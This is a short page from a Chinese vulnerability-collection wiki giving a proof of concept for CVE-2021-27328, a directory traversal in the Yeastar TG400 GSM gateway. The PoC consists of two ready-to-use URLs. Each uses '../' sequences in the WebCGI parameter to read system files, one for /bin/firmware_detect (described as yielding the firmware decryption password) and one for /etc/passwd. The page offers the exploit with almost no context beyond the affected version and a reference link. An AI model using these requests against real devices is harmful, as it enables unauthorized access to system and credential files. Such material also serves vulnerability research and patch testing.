menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right 朗视TG400 GSM 网关目录遍历 (CVE-2021-27328).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    朗视TG400 GSM 网关目录遍历 (CVE-2021-27328).md
    381 B / 2021-05-21 09:14:38
        # 朗视TG400 GSM 网关目录遍历 (CVE-2021-27328)

影响版本:

Yeastar TG400 GSM-91.3.0.3

**PoC:**

```bash
获取固件解密密码
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
/etc/passwd:
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
```

ref:

https://github.com/SQSamir/CVE-2021-27328
    links
    file_download